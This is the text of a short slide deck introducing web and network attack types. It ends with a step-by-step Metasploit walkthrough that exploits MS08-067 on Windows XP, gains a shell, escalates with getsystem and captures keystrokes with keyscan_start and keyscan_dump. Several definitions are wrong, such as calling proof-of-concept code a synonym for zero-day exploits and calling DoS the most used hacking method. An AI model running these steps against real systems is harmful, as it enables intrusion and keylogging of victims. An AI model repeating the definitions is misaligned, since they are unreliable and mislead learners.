introduction of exploit on window xp & trick

Latest Technologies (Exploit Tricks)

Uploaded byIndu Rajawat & Megha Kahndelwal latest.com.co (Imperial Soft Tech)

CONTENTS

1.Introduction2.Types3.Exploit Design Goals4.Exploit Mixins5.MS08_067_netapi Vulnerability (an example of exploit mixins)

latest.com.co (Imperial Soft Tech)

INTRODUCTION

An exploit is a piece of software of chunk of data that takes advantage of velnerability or bug in order to cause unintended or unanticipated behavior to occur on computer.


TYPES1.Xss(Cross site scripting)

2.Sql injection

3.Clickjacking

4.DDos attack

5.POC attack (Proof of conect)

6.Spoofing

Xss

Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers.


Sql injection

SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.


Clickjacking

clickjacking attacks a fundamental design of HTML itself. It's pulled off by hiding the target URL within a specially designed iframe that's concealed by a decoy page that contains submission buttons.


DDos attack

A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a webite but it is used to take down a website.

If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking


PoC attack

In computer security the term proof of concept (proof of concept code or PoC) is often used as a synonym for a zero-day exploit which, mainly for its early creation, does not take full advantage over some vulnerability.


Spoofing

a spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data and thereby gaining an illegitimate advantage.

Design Goals

1.Design goals should be minimalist.2.Proof of concepts should be written as Auxiliary DoS modules, not as exploits. 3.The final exploit reliability must be high. 4.Target lists should be inclusive. 5.exploits should be readable as well.


Exploit Mixins

1.Exploit::Remote::Tcp

2.Exploit::Remote::DCERPC

3.Exploit::Remote::SMB

4.Exploit::Remote::BruteTargets


MS08_067_netapi Vulnerability

This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely. On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-based systems, an attacker could exploit this vulnerability over RPC without authentication and could run arbitrary code.


Steps:1).msfconsole2).search exploits3).use exploits/windows/smb/ms08_067_netapi4).show options5).set lhost 6).set rhost7). exploit8).now go to window xp in command window and type netstat -ms

Command prompt

Steps 9). ps10). migrate (PID) 11). screenshot12). shell13). cd documents & settings14). cd admin15). cd desktop16). md folder17). exit

Screen-shot


New folder


Steps18). help19). getsystem20). keyscan_start21). now go to window xp n open notepad n write something22). keyscan_dump23). keyscan_stop


Thank u


[email protected]

Contact Us on

latest.com.co (Imperial Soft Tech))

introduction of exploit on window xp & trick

Technology

imperial soft tech

example of exploit

exploit mixins

day exploit

exploit design goals

final exploit reliability

attack proof

spoofing attack